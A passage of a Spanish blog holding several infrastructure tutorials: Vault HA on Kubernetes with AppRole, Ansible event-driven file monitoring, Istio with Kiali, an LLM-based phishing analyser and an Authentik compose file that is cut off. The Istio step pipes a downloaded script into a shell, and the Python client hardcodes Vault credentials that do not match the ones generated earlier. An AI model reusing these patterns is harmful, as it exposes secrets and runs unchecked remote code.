HashiCorp Vault es una herramienta de código abierto diseñada para almacenar y gestionar de forma segura información sensible como secretos (claves API, contraseñas, certificados, etc.), tokens y claves de cifrado. Vault proporciona una interfaz unificada para administrar estos secretos de manera segura en distintos entornos, incluyendo infraestructuras en la nube, aplicaciones y servicios. Es capaz de manejar secretos dinámicos, ofrecer cifrado como servicio y admite diversos métodos de autenticación para controlar el acceso.

Preparación de Entorno

Tengo un cluster con un master y un worker, en Kubernetes. Para esa prueba de concepto, estoy usando microK8s.

Esta todo listo para comenzar a trabajar. Vamos a necesitar tener helm, instalado. Corremos los siguientes comandos para agregar y actualizar nuestras fuentes.

helm repo add hashicorp https://helm.releases.hashicorp.com
helm repo update

Para tener una idea de que vamos a estar haciendo, les dejo esta grafica.

Instalación Vault con Raft

Antes que nada vamos a crear custom-values.yaml para habilitar la alta disponibilidad (HA) y configurar el backend Raft.

server:
  affinity: ""
  ha:
    enabled: true
    raft:
      enabled: true

HashiCorp Vault utiliza Raft como backend de almacenamiento para garantizar alta disponibilidad, replicación de datos y una fuerte consistencia entre los nodos del clúster. Raft permite que Vault funcione sin dependencias externas, lo que facilita su gestión y escalabilidad, asegurando al mismo tiempo tolerancia a fallos y una recuperación confiable ante fallos.

Aplicamos.

helm install vault hashicorp/vault -f custom-values.yaml --namespace vault --create-namespace

Deberías ver pods con el estado 0/1. Esto indica que los pods de Vault están en ejecución, pero aún no han sido inicializados ni desbloqueados (unsealed).

Vamos a inicializar el vault-0 de la siguiente manera.

kubectl exec -n vault vault-0 -- vault operator init

Ahora tenemos inicializado el pod master.

Importante: Guarda estas claves de forma segura, ya vas a necesitarár al menos 3 de ellas para desbloquear (unseal) Vault en caso de un reinicio o de que se vuelva a reseal.

Desbloquea (unseal) Vault utilizando tres de las claves de desbloqueo en cada pod de Vault. Esto hay que hacerlo en todos los podes vault-0, vault-1 & vault-2.

kubectl exec -n vault vault-0 -- vault operator unseal  Key1>
kubectl exec -n vault vault-0 -- vault operator unseal  Key2>
kubectl exec -n vault vault-0 -- vault operator unseal  Key3>

Nos queda sumar los demas pods al cluster raft.

kubectl exec -ti vault-1 -n vault -- vault operator raft join http://vault-0.vault-internal:8200

Luego hacemos el unseal.

kubectl exec -n vault vault-1 -- vault operator unseal  Key1>
kubectl exec -n vault vault-1 -- vault operator unseal  Key2>
kubectl exec -n vault vault-1 -- vault operator unseal  Key3>

Repetimos esta operación con el vault-2.

Una vez que terminamos el trabajo vamos a ver como nos quedo el cluster.

kubectl exec -ti vault-0 -n vault -- vault login
kubectl exec -ti vault-0 -n vault -- vault operator raft list-peers

Uala! Tenemos el “lider” y los seguidores.

Verificamos el estado de todos nuestros pods. Y vemos que estan listos para ser utilizados.

Ingress a Vault

Para exponer la interfaz web (UI) de HashiCorp Vault mediante Ingress y asegurarla con TLS, seguí estos pasos. Asegurate de tener Cert-Manager instalado para gestionar la provisión de certificados a través de Let’s Encrypt. Si no sabes como hacerlo, podes revisar aca.

Voy agregar el Token, que necesito de Cloudflare, en el Cluster.

kubectl create secret generic cloudflare-api-token-secret \
  --namespace cert-manager \
  --from-literal=api-token="TOKEN"

Vamos a crear nuestro cloudflare-clusterissuer.yaml y realizar el challange.

apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
  name: letsencrypt-dns-cloudflare
spec:
  acme:
    email: TUMAIL
    server: https://acme-v02.api.letsencrypt.org/directory
    privateKeySecretRef:
      name: letsencrypt-dns-cloudflare-key
    solvers:
      - dns01:
          cloudflare:
            email: TUMAIL
            apiTokenSecretRef:
              name: cloudflare-api-token-secret
              key: api-token

Ahora si! Vamos aplicar el ingress-vault.yaml.

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: vault-ingress
  namespace: vault
  annotations:
    cert-manager.io/cluster-issuer: letsencrypt-dns-cloudflare
    nginx.ingress.kubernetes.io/ssl-redirect: "true"
    nginx.ingress.kubernetes.io/backend-protocol: "HTTP"
spec:
  ingressClassName: nginx
  rules:
    - host: vault.esprueba.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: vault # Ojo aca, puede ser que sea vault-ui
                port:
                  number: 8200
  tls:
    - hosts:
        - vault.esprueba.com
      secretName: vault-tls

Listo! Ya esta con interfaz!

Siguiendo estos pasos, has configurado con éxito un clúster de HashiCorp Vault de múltiples nodos con alta disponibilidad, utilizando Raft para la replicación y consistencia de los datos. Esta configuración garantiza que tu sistema de gestión de secretos sea resiliente, escalable y seguro sobre Kubernetes. Al exponer la interfaz web de Vault de forma segura mediante Ingress, la administración y monitoreo de secretos se vuelve aún más ágil.

Implementación

Nos vamos a autenticar y generar unos secretos para consumir.

kubectl exec -ti vault-0 -n vault -- vault login
vault secrets enable -path=secret kv
vault kv put secret/demo username=santiago password=supersecreto

Ahora vamos a generar el código para consumirlo. Voy hacer algo sencillo en Python. Pero antes tengo que crear un Rol, que tenga permisos para consumirlo.

vault policy write read-secret - <
path "secret/demo" {
  capabilities = ["read"]
}
EOF

Esto otorga permiso solo para leer secret/demo. Ahora habilitamos el AppRole.

vault auth enable approle

Creamos el AppRole con tokens validos por 1 hora y renovables cada 4 horas. Lo vamos a llamar python-reader.

vault write auth/approle/role/python-reader \
  token_policies="read-secret" \
  token_ttl=1h \
  token_max_ttl=4h

Vamos a obtener los datos necesarios para nuestra aplicación. Solo esta vez.

/ $ vault read -field=role_id auth/approle/role/python-reader/role-id
3faac7e2-4ba8-1de1-eea6-92c420a47015
/ $ vault write -f -field=secret_id auth/approle/role/python-reader/secret-id
107f3d2d-9b18-8fd5-4194-74562d6339b9

Ya tenemos nuestro role-id & secret-id. Ahora vamos correr nuestro app.py.

import hvac
import warnings


client = hvac.Client(url="https://vault.esprueba.com")

ROLE_ID = "3faac7e2-4ba8-1de1-eea6-92c420a47015"
SECRET_ID = "1803cfd7-ce7e-8e18-1a68-e1e512e77f9d"

# Login con AppRole
login_response = client.auth.approle.login(role_id=ROLE_ID, secret_id=SECRET_ID)
client.token = login_response["auth"]["client_token"]

# Si tu secreto está en KV v1 (como vimos antes)
secret_response = client.secrets.kv.v1.read_secret(path="demo", mount_point="secret")

data = secret_response["data"]
print("✅ Secreto leído:")
print("👤 Usuario:", data.get("username"))
print("🔑 Password:", data.get("password"))

Listo!

La advertencia del módulo SSL de Python (ssl) que está enlazado contra LibreSSL. urllib3 inspecciona esa biblioteca en tiempo de ejecución, y si ve que no es OpenSSL 1.1.1+ por eso lanza el warning.

Estas son las ventajas de implementar de esta manera.

Gestión centralizada de secretos
Vault se convierte en el único punto de control de secretos. Ya no hay credenciales hardcodeadas en el código, archivos .env, imágenes de Docker ni pipelines de CI/CD.
Autenticación robusta con AppRole
AppRole separa identidad (role_id) de autenticación (secret_id), lo que permite controlar y auditar accesos con precisión. Incluso si un atacante accede al role_id, no puede autenticarse sin el secret_id.
Rotación de secretos sin downtime
Si cambiás un secreto en Vault, la app podrá leer el nuevo valor en el próximo acceso. No es necesario reiniciar ni desplegar nuevamente.
Aplicación del principio de menor privilegio
Las políticas de Vault permiten que cada AppRole acceda únicamente a los paths que necesita. Si una app solo necesita secret/demo, no puede ver nada más.
Auditoría completa y trazabilidad
Vault registra cada solicitud: qué secreto se accedió, desde qué AppRole, en qué momento. Esto permite trazabilidad y cumplimiento normativo.

Espero que les sirva!

Respondiendo a Eventos de manera automatizada, con Ansible Rulebooks.

Santiago Fernandez — Wed, 12 Mar 2025 14:49:18 GMT

La automatización basada en eventos permite al equipo de SecOps ejecutar acciones predefinidas automáticamente en respuesta a eventos específicos dentro de un entorno. Este enfoque mejora la eficiencia operativa al reducir la intervención manual y permite que los sistemas se adapten rápidamente a las condiciones cambiantes. Ansible nos ayuda al incorporar funciones basadas en eventos para ofrecer soporte a una automatización dinámica y receptiva.

Arquitectura

Para emplear la Automatización de Ansible Basada en Eventos, es fundamental entender tres conceptos:

Fuente de Eventos
Ansible Rulebooks
Acciones

Las fuentes son el origen de los eventos que desencadenarán el proceso para ser evaluado por las condiciones del ansible rulebook. Si se cumplen estas condiciones, se procederá a ejecutar un playbook, un módulo o, en su defecto, invocar un script. Esto hace de esta herramienta una excelente opción para diversos casos de uso.

Instalación

Vamos a actualizar.

sudo apt update && sudo apt upgrade -y

Ahora es el turno de Java.

sudo apt install openjdk-17-jdk
export JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64
export PATH=$PATH:~/.local/bin

Vamos agregar Python3 con Pip, siempre necesario, y Pipx para tener en todo nuestro entorno ansible.

sudo apt install python3 python3-pip pipx ansible-core
pipx install ansible
pipx install ansible-rulebook
pipx install ansible-runner

Ahora la frutilla del postre, ansibe.eda.

ansible-galaxy collection install ansible.eda

Ya tenemos nuestro servidor, listo.

Prueba de Concepto

Este es un ejemplo de ansible-rulebook para supervisar cambios utilizando el módulo ansible.eda.file_watch. Envía un mensaje a Slack cuando se cumple la condición event.change == "modified" o event.change == "created". En mi caso, quiero supervisar /home/santiago/data, pero ¿no sería una buena idea monitorear, por ejemplo, /etc/passwd, /etc/shadow?

filewatch.yml
---
- name: Monitor /home/santiago for file changes
  hosts: localhost
  sources:
    - name: file_watch
      ansible.eda.file_watch:
        path: /home/santiago/data
        recursive: true
        exclude_patterns:
          - "*.log"
          - "*.tmp"
  rules:
    - name: Notify Slack if a file is modified
      condition: event.change == "modified" and event.type == "FileModifiedEvent"
      action:
        run_playbook:
          name: notify-slack.yml
          extra_vars:
            event_path: "{{ event.src_path }}"
            event_change: "{{ event.change }}"
      throttle:
        once_within: "60 seconds"  # Formato correcto: "60 seconds"
        group_by_attributes:       # Agrupa eventos por estos atributos
          - src_path              # Agrupa por la ruta del archivo

    - name: Notify Slack if a new file is created
      condition: event.change == "created" and event.type == "FileCreatedEvent"
      action:
        run_playbook:
          name: notify-slack.yml
          extra_vars:
            event_path: "{{ event.src_path }}"
            event_change: "{{ event.change }}"
      throttle:
        once_within: "60 seconds"  # Formato correcto: "60 seconds"
        group_by_attributes:       # Agrupa eventos por estos atributos
          - src_path              # Agrupa por la ruta del archivo

Si estas condiciones se cumplen, ejecuta notify-slack.yml.

notify-slack.yml
---
- name: Send Slack Notification
  hosts: localhost
  tasks:
    - name: Debug event variables
      debug:
        msg:
          - "Event Path: {{ event_path }}"
          - "Event Change: {{ event_change }}"

    - name: Send message to Slack
      community.general.slack:
        token: "ACA_TOKEN" # Seria mejor que esto este como variable en un .ini o hagas un export
        channel: "#alarms" # Este es el canal que uso.
        msg: "🚨 Archivo detectado en /home/santiago/data: {{ event_path }} ({{ event_change }})"
        username: "Ansible Bot"

💡

Si no sabes como crear una aplicacion en Slack, para poder interactuar en el feed. Revisa esta documentacion.

Creamos nuestro inventorio, en mi caso solo lo hare local pero podrias tener una granja de servidores a monitorear. Vamos a llamarlo inventory.yml.

all:
  children:
    ungrouped:
      hosts:
        localhost:
          ansible_connection: local

Ejecutamos Ansible Event Drive Automation de la siguiente manera, haciendo referencia al inventario de activos y al playbook.

ansible-rulebook -i inventory.yml -r filewatch.yml

Primero, creamos el archivo.txt y luego realizamos una modificación. Aquí observamos cómo se ejecutan los eventos y se notifican en Slack. La creación provoca una modificación al guardarlo.

Aquí están los mensajes que nos llegan a Slack.

Conclusion

Con EDA no tenemos límites; podemos aplicarlo a múltiples escenarios, como responder ante incidentes, escalar infraestructura, reiniciar servicios o cumplir con regulaciones. Sin duda, es un aliado al considerar la operación de SecOps o DevOps. ¡Dejemos volar la imaginación!

Referencias

https://developers.redhat.com/articles/2024/04/12/event-driven-ansible-rulebook-automation#ansible_rulebook_cli_setup

https://dzone.com/articles/ansible-event-driven-automation-real-time-operations

Istio en acción: Seguridad, tráfico y visibilidad en Kubernetes

Santiago Fernandez — Mon, 03 Feb 2025 14:29:47 GMT

Con el avance de las aplicaciones nativas de la nube, gestionar microservicios a gran escala se vuelve cada vez más complicado. Kubernetes se ha convertido en la plataforma estándar para orquestar aplicaciones en contenedores. Sin embargo, a medida que su arquitectura de microservicios crece, también aumenta la necesidad de una gestión avanzada del tráfico, la observabilidad y la seguridad dentro de sus clústeres de Kubernetes. Aquí es donde entran Istio y Kiali. Juntos, ofrecen herramientas poderosas para gestionar, visualizar y proteger sus micro servicios.

¿Que es Istio?

Istio es un Service Mesh Open Source que proporciona una forma uniforme de proteger, conectar y observar microservicios. Proporciona capacidades críticas como la gestión del tráfico, la seguridad y la capacidad de observación y sin necesidad de realizar cambios en el código de la aplicación.

Características

Manejo de Trafico

Load Balancing: Istio permite un control preciso del tráfico, como load balancing, traffic splitting y canary releases.
Routing: Permite reglas de enrutamiento avanzadas, haciendo posible dirigir el tráfico basándose en cabeceras HTTP, cookies y otros criterios.
Fault Injection: Puedes simular fallos para probar la resiliencia de tus microservicios inyectando fallos como delays o aborts.

Seguridad

Mutual TLS (mTLS): Istio proporciona cifrado de extremo a extremo entre servicios, garantizando una comunicación segura dentro de la malla.
Authorization Policies: Permite imponer un control de acceso detallado entre servicios.
Identity and Access Management: Istio se integra con los sistemas de autenticación y autorización existentes.

Observabilidad

Distributed Tracing: Istio se integra con herramientas como Jaeger y Zipkin para proporcionar capacidades de rastreo a través de microservicios.
Metrics Collection: Recopila métricas a nivel de servicio, que se pueden visualizar con Prometheus y Grafana.
Logging: Istio recopila logs de todas las interacciones del servicio, lo que facilita la monitorización y depuración de tus aplicaciones.

¿Que es Kiali?

Kiali proporciona una interfaz visual para observar y gestionar su malla de servicios, ofreciendo información sobre cómo interactúa el Service Mesh. Kiali se integra perfectamente con Istio, lo que le permite visualizar la topología de su malla de servicios, supervisar el estado de sus microservicios y solucionar problemas.

Características

Service Mesh Visualization

Graphical Representation: Kiali ofrece un gráfico en tiempo real de tu service mesh, mostrando cómo interactúan los servicios y resaltando cualquier problema potencial.
Traffic Flow: Visualiza el flujo de tráfico entre servicios, ayudándole a entender cómo se enrutan las peticiones.
Health Indicators: Kiali ofrece indicadores Health Check de tus servicios, mostrando errores, tiempos de respuesta y otras métricas clave.

Configuration Validation

Istio Config Checks: Kiali comprueba sus configuraciones de Istio en busca de errores e incoherencias, ayudándole a evitar configuraciones erróneas que podrían provocar fallos en el servicio.
Policy Validation: Garantiza que sus políticas de seguridad y enrutamiento se apliquen correctamente y funcionen según lo previsto.

Detailed Metrics and Tracing

Metrics Integration: Kiali se integra con Prometheus para mostrar métricas en tiempo real y datos históricos de los servicios dentro de su malla.
Tracing Integration: Al integrarse con Jaeger o Zipkin, Kiali proporciona datos de rastreo distribuidos, lo que le permite rastrear las solicitudes a medida que se propagan a través de sus microservicios.

Traffic Management

Traffic Routing: Kiali permite visualizar y modificar configuraciones de enrutamiento de tráfico, como despliegues canarios y desplazamiento de tráfico, directamente desde la consola.
Fault Injection and Testing: Puedes simular fallos y latencia dentro de la malla para probar la resiliencia de tus servicios.

Está claro que Istio junto con Kiali nos ayuda a gestionar nuestro Service Mesh de manera gráfica y confiable. Vamos a instalar ambos productos en nuestro clúster, junto con una aplicación, para ver qué podemos lograr. Tendremos una mejor observabilidad que nos ayudará a la hora de solucionar problemas, podremos mejorar la gestión del tráfico, adoptaremos una postura de seguridad mucho más agresiva y, sobre todo, una forma de configuración proactiva.

Instalación

Istio

Desgargar Istio e ingresamos a la carpeta. En mi caso, al momento de la entrada, tengo la version istio-1.24.2.

curl -L https://istio.io/downloadIstio | sh -

cd istio-1.24.2

Agregamos el PATH e instalamos.

export PATH=$PWD/bin/.istioctl/bin:$PATH
istioctl install

Revisamos nuestra instalación.

Aplicativo

Voy a usar un sample, que viene con Istio. Añadimos una etiqueta al namespace para indicar a Istio que inyecte automáticamente proxies Envoy sidecar cuando despleguemos nuestra aplicación más adelante.

# Creo un namespace
kubectl create ns istio-test
# Aplicamos para que se inyecten los tags.
kubectl label namespace istio-test istio-injection=enabled
# Instalamos la aplicacion
kubectl apply -f samples/bookinfo/platform/kube/bookinfo.yaml -n istio-test

La aplicación que desplegamos se verá algo así:

Vamos a revisar si tenemos el rollout listo, antes desplegamos nuestro Gateway.

kubectl apply -f samples/bookinfo/networking/bookinfo-gateway.yaml
kubectl get gateway

Revisamos a donde apunta, para el ingreso externo.

kubectl get svc istio-ingressgateway -n istio-system

Vamos a hacerla mas facil llenando nuestras variables de entorno.

export INGRESS_NAME=istio-ingressgateway
export INGRESS_NS=istio-system
export INGRESS_HOST=$(kubectl -n "$INGRESS_NS" get service "$INGRESS_NAME" -o jsonpath='{.status.loadBalancer.ingress[0].ip}')
export INGRESS_PORT=$(kubectl -n "$INGRESS_NS" get service "$INGRESS_NAME" -o jsonpath='{.spec.ports[?(@.name=="http2")].port}')
export GATEWAY_URL=$INGRESS_HOST:$INGRESS_PORT

Ejecutamos

curl -s "http://${GATEWAY_URL}/productpage" | grep -o ".*"

Tendría que devolvernos este mensaje

Simple Bookstore App

Vamos a revisar la Web, para confiramar.

Listo nuestro aplicativo!

Kiali

Desplegamos el Dashboard de Kiali, junto con Prometheus, Grafana. Dentro de la carpeta de Istio.

kubectl apply -f samples/addons

Ingresamos al Dashboard.

istioctl dashboard kiali

Ahora si podemos revisar! Tenemos miles de opciones para configurar y entender nuestro entorno. Algunas de las opciones. Por ejemplo aca graficamos como esta el servicio de productpage.

Algunas opciones, para jugar.

Sin dudas una herramienta para tener en nuestra navaja suiza, como administrador de Kubernetes.

Espero que les haya gustado la entrada, nos vemos en la próxima.

Referencias

https://shashwotrisal.medium.com/getting-started-with-istio-service-mesh-7441265b7c5b

https://medium.com/@baazigames/leveraging-istio-and-kiali-for-enhanced-kubernetes-cluster-management-4696c5b266b5

Analizando correos con Inteligencia Artificial

Santiago Fernandez — Thu, 17 Oct 2024 00:06:17 GMT

No hace falta que les cuente que hubo casi 1,9 millones de ataques de phishing en el último año, con 877.536 sólo en el segundo trimestre de 2024. Las estafas de Business Email Compromise (BEC) también han aumentado, con un importe medio solicitado de 89.520 dólares por incidente. Nos ponemos manos a la obra con este mini proyecto, que a mi entender es util y divertido.

Arquitectura

El usuario envía un correo sospechoso a una casilla.
n8n revisa la casilla cada cierto tiempo.
Si encuentra un correo, lo envía para analizar.
La primera API que usamos es Virus Total.
Luego analizamos con Ollama y un modelo preparado para este propósito.
Le pedimos a Ollama que formatee el análisis y cree un HTML.
n8n envía el reporte al usuario que tenía la sospecha.

Aca les dejo el repositorio del proyecto, donde se encontraran con esta estructura.

En la carpeta app estará el siguiente Python que tiene estos tres métodos: /analyze, /analyze_mail, /format_text.

Metodo Analyze Email

# Ruta para analizar el cuerpo del correo
@app.route('/analyze_email', methods=['POST'])
def analyze_email():
    try:
        # Extraer el contenido del correo desde el cuerpo de la solicitud POST
        data = request.get_json()  # Asegurarse de que se obtiene un JSON parseado

        # Verificar si 'email_content' está en el JSON
        email_content = data.get('email_content')
        if not email_content:
            return jsonify({"error": "El contenido del correo es requerido."}), 400

        # Verificar si 'from' está en el JSON
        email_from = data.get('from')
        if not email_from:
            return jsonify({"error": "El campo 'from' es requerido."}), 400

        # Construir el mensaje a ser enviado al modelo
        model_messages = [
            {
                "role": "system",
                "content": "Analyze the provided email content and metadata to determine if it's a potential phishing attempt. Provide your analysis in a structured format matching the SimplePhishingAnalysis model. Important the response in HTML Format",
            },
            {
                "role": "user",
                "content": email_content,  # Aquí se incluye el contenido del correo
            }
        ]

        # Llamada al modelo local de Ollama para analizar el correo
        response = ollama.chat(
            model=os.getenv('OLLAMA_MODEL', 'gemma2:9b-instruct-q4_K_M'),  # Usar la variable de entorno para el modelo
            messages=model_messages
        )

        # Como `ollama.chat` devuelve una cadena, la parseamos para agregar 'from'
        analysis_result = {"result": response, "from": email_from}

        return jsonify({"analysis_result": analysis_result})
    except Exception as e:
        return jsonify({"error": str(e)}), 500

Metodo Analyze Virus Total

# Endpoint para manejar el análisis de archivos
@app.route('/analyze', methods=['POST'])
def analyze_file():
    try:
        # Verificar si la clave API está cargada
        if not API_KEY:
            return jsonify({"error": "API Key not found"}), 400

        # Verificar si se ha incluido un archivo en la solicitud
        if 'file' not in request.files:
            return jsonify({"error": "No file part in the request"}), 400

        # Obtener el archivo desde la solicitud
        file = request.files['file']

        # Verificar si el archivo tiene un nombre
        if file.filename == '':
            return jsonify({"error": "No selected file"}), 400

        # Si el archivo existe, proceder con el análisis
        if file:
            # Guardar el archivo temporalmente para enviarlo a VirusTotal
            temp_path = Path(f"/tmp/{file.filename}")
            file.save(temp_path)

            # Abrir el archivo en modo binario y enviarlo para análisis
            with open(temp_path, 'rb') as f:
                params = {'apikey': API_KEY}
                files = {'file': (file.filename, f)}
                response = requests.post(upload_url, files=files, params=params)

            # Verificar si la subida fue exitosa
            if response.status_code == 200:
                result = response.json()
                scan_id = result['scan_id']

                # Esperar para que el análisis esté listo
                time.sleep(10)

                # Consultar el reporte utilizando el scan_id
                report_params = {'apikey': API_KEY, 'resource': scan_id}
                report_response = requests.get(report_url, params=report_params)

                # Verificar si la recuperación del reporte fue exitosa
                if report_response.status_code == 200:
                    report_result = report_response.json()

                    # Obtener el número de motores antivirus que marcaron el archivo como malicioso
                    positives = report_result.get('positives', 0)
                    total = report_result.get('total', 0)

                    # Construir el objeto resultado para retornarlo en formato JSON
                    file_result = {
                        "file_name": file.filename,
                        "scan_id": scan_id,
                        "positives": positives,
                        "total": total,
                        "is_malicious": positives > 0,
                        "permalink": report_result.get('permalink')
                    }

                    return jsonify(file_result), 200
                else:
                    return jsonify({"error": "Error retrieving report from VirusTotal"}), 500
            else:
                return jsonify({"error": "Error uploading file to VirusTotal"}), 500
    except Exception as e:
        return jsonify({"error": str(e)}), 500

Metodo Format Text

# Endpoint para formatear texto a HTML
@app.route('/format_text', methods=['POST'])
def format_text():
    try:
        # Extraer el contenido del texto desde el cuerpo de la solicitud POST
        data = request.get_json()  # Asegurarse de que se obtiene un JSON parseado

        # Verificar si 'text' está en el JSON
        text = data.get('text')
        if not text:
            return jsonify({"error": "El texto es requerido."}), 400

        # Verificar si 'from' está en el JSON
        email_from = data.get('from')
        if not email_from:
            return jsonify({"error": "El campo 'from' es requerido."}), 400

        # Construir el mensaje a ser enviado al modelo
        model_messages = [
            {
                "role": "system",
                "content": (
                    "Formatea el texto proporcionado en HTML. "
                    "Asegúrate de que la salida esté bien estructurada, visualmente atractiva, y en español. "
                    "El HTML debe estar organizado según la siguiente estructura:\n"
                    "- is_potential_phishing: booleano\n"
                    "- is_malicious: booleano\n"
                    "- phishing_probability: enum (BAJA, MEDIA, ALTA)\n"
                    "- suspicious_elements: lista de objetos (elemento, motivo)\n"
                    "- recommended_actions: lista de acciones recomendadas\n"
                    "- explanation: explicación"
                )
            },
            {
                "role": "user",
                "content": text  # Aquí se incluye el texto a formatear
            }
        ]

        # Llamada al modelo local de Ollama para formatear el texto
        response = ollama.chat(
            model=os.getenv('OLLAMA_MODEL', 'gemma2:9b-instruct-q4_K_M'),  # Usar la variable de entorno para el modelo
            messages=model_messages
        )

        # Limpiar el texto recibido eliminando '```html\n' al inicio y '```' al final
        formatted_html = response.get('message', {}).get('content', "")
        formatted_html = formatted_html.replace("```html\n", "").replace("```", "").strip()

        # Incluir 'from' en el resultado JSON
        result = {
            "formatted_html": formatted_html,
            "from": email_from  # Agregar 'from' al resultado
        }

        return jsonify(result)
    except Exception as e:
        return jsonify({"error": str(e)}), 500

Les dejo el Dockerfile para la creación del contenedor. Será importante que el archivo .env tenga la API Key de Virus Total.

En la raíz encontrarán el docker-compose que tiene n8n. Una vez que lo ejecuten, podrán subir la configuración que dejé en config_n8n.

💡

En mi caso, estoy ejecutando Ollama y la API localmente, pero no sería mala idea agregar ambos contenedores al docker-compose para tener un solo archivo de ejecución.

Workflow

El flujo de trabajo, en una primera instancia, verifica si el correo reportado tiene o no adjuntos. Si los tiene, realizará una iteración para determinar cuántos deben enviarse a analizar a Virus Total. Unifica las respuestas, tanto del cuerpo del correo como de los adjuntos, para luego crear la respuesta al usuario que tenía la duda. De caso contrario analizara el cuerpo y luego generara la respuesta.

Ollama

Vamos a utilizar Ollama, para ello lo descargamos. En mi caso voy a usar gemma2:9b-instruct-q4_K_M como modelo. ¿Por qué usaremos gemma? Por ser conocido por su gran rendimiento en relación con su tamaño, esa es la justificación.

Para instalar el modelo, ejecutamos ollama pull gemma2:9b-instruct-q4_K_M.

Aunque la detección de phishing basada en LLM ofrece una gran capacidad de adaptación y comprensión contextual, pero no se puede confiar solo en ella. Para una seguridad completa, es esencial integrar este enfoque con los métodos de detección tradicionales. Las herramientas de análisis estático que señalan Indicadores de Compromiso (IoC) conocidos, como URL sospechosas o archivos adjuntos, siguen siendo componentes vitales de una estrategia de seguridad sólida.

Utilizamos la biblioteca Instructor con Pydantic para crear modelos de datos sólidos para nuestros análisis. Debemos verlo como plantillas para organizar los datos.

Al definir estos modelos por adelantado, nos aseguramos de que los resultados de nuestros análisis estén estructurados de forma coherente.

# Definición de modelos Pydantic para el análisis estructurado
class PhishingProbability(str, Enum):
    LOW = "low"
    MEDIUM = "medium"
    HIGH = "high"

class SuspiciousElement(BaseModel):
    element: str
    reason: str

class SimplePhishingAnalysis(BaseModel):
    is_potential_phishing: bool
    is_malicious: bool
    phishing_probability: PhishingProbability
    suspicious_elements: List[SuspiciousElement]
    recommended_actions: List[str]
    explanation: str

Para el prompt del sistema, utilizaremos una instrucción simple:

Analyze the provided email content and metadata to determine if it's a potential phishing attempt. Provide your analysis in a structured format matching the SimplePhishingAnalysis model. Important the response in HTML Format.

        # Construir el mensaje a ser enviado al modelo
        model_messages = [
            {
                "role": "system",
                "content": "Analyze the provided email content and metadata to determine if it's a potential phishing attempt. Provide your analysis in a structured format matching the SimplePhishingAnalysis model. Important the response in HTML Format",
            },
            {
                "role": "user",
                "content": email_content,  # Aquí se incluye el contenido del correo
            }
        ]

        # Llamada al modelo local de Ollama para analizar el correo
        response = ollama.chat(
            model=os.getenv('OLLAMA_MODEL', 'gemma2:9b-instruct-q4_K_M'),  # Usar la variable de entorno para el modelo
            messages=model_messages
        )

Prueba de Concepto

Vamos a enviar este correo, para que sea analizado por nuestro Workflow.

Aca vemos las llamadas de nuestra API.

Aquí el análisis que creó nuestra LLM.

¡Uala! Ya tenemos el reporte para el análisis por parte del usuario. Queda bastante por mejorar y perfeccionar nuestro reporte, pero ya es un comienzo. Espero que les sea útil y disfruten modificándolo.

Referencias

https://apwg.org/

https://medium.com/@theofoucher/leveraging-llms-for-phishing-email-detection-8e480dfd3bad

Gobernando Identidades Corporativas

Santiago Fernandez — Wed, 09 Oct 2024 15:46:54 GMT

Infraestructura

La idea es manejar nuestras identidades con Authentik. ¿Qué es Authentik? Es una solución que hará que el registro de nuestros usuarios sea más fácil, eliminando la necesidad de tareas manuales. Es una manera sencilla de integrarse con nuestro entorno actual, sin tener que hacer grandes cambios. Además, es compatible con la mayoría de los proveedores como OAuth2, SAML, LDAP y SCIM.

En nuestro caso tendremos las identidades corporativas en un IDP que sera OpenLDAP. La idea es que los usuarios que tenemos en este directorio activo logren ingresar a nuestro Proxmox via OAuth2 como SSO.

Docker Compose

Vamos a crear un ambiente para gobernar nuestras corporativas para ello vamos a correr nuestro docker-compose.yaml que es el siguiente:

services:
  postgresql:
    image: docker.io/library/postgres:16-alpine
    networks:
      - 'ldap-auth'
    restart: unless-stopped
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -d $${POSTGRES_DB} -U $${POSTGRES_USER}"]
      start_period: 20s
      interval: 30s
      retries: 5
      timeout: 5s
    volumes:
      - database:/var/lib/postgresql/data
    environment:
      POSTGRES_PASSWORD: ${PG_PASS:?database password required}
      POSTGRES_USER: ${PG_USER:-authentik}
      POSTGRES_DB: ${PG_DB:-authentik}
    env_file:
      - .env
  redis:
    image: docker.io/library/redis:alpine
    networks:
      - 'ldap-auth'
    command: --save 60 1 --loglevel warning
    restart: unless-stopped
    healthcheck:
      test: ["CMD-SHELL", "redis-cli ping | grep PONG"]
      start_period: 20s
      interval: 30s
      retries: 5
      timeout: 3s
    volumes:
      - redis:/data
  server:
    image: ${AUTHENTIK_IMAGE:-ghcr.io/goauthentik/server}:${AUTHENTIK_TAG:-2024.8.3}
    networks:
      - 'ldap-auth'    
    restart: unless-stopped
    command: server
    environment:
      AUTHENTIK_REDIS__HOST: redis
      AUTHENTIK_POSTGRESQL__HOST: postgresql
      AUTHENTIK_POSTGRESQL__USER: ${PG_USER:-authentik}
      AUTHENTIK_POSTGRESQL__NAME: ${PG_DB:-authentik}
      AUTHENTIK_POSTGRESQL__PASSWORD: ${PG_PASS}
    volumes:
      - ./media:/media
      - ./custom-templates:/templates
    env_file:
      - .env
    ports:
      - "${COMPOSE_PORT_HTTP:-9000}:9000"
      - "${COMPOSE_PORT_HTTPS:-9443}:9443"
    depends_on:
      - postgresql
      - redis
  worker:
    image: ${AUTHENTIK_IMAGE:-ghcr.io/goauthentik/server}:${AUTHENTIK_TAG:-2024.8.3}
    networks:
    - 'ldap-auth'
    restart: unless-stopped
    command: worker
    environment:
      AUTHENTIK_REDIS__HOST: redis
      AUTHENTIK_POSTGRESQL__HOST: postgresql
      AUTHENTIK_POSTGRESQL__USER: ${PG_USER:-authentik}
      AUTHENTIK_POSTGRESQL__NAME: ${PG_DB:-authentik}
      AUTHENTIK_POSTGRESQL__PASSWORD: ${PG_PASS}
    # `user: root` and the docker socket volume are optional.
    # See more for the docker socket integration here:
    # https://goauthentik.io/docs/outposts/integrations/docker
    # Removing `user: root` also prevents the worker from fixing the permissions
    # on the mounted folders, so when removing this make sure the folders have the correct UID/GID
    # (1000:1000 by default)
    user: root
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - ./media:/media
      - ./certs:/certs
      - ./custom-templates:/templates
    env_file:
      - .env
    depends_on:
      - postgresql
      - redis

  openldap:
    image: osixia/openldap:1.5.0
    networks:
      - 'ldap-auth'
    container_name: openldap
    environment:
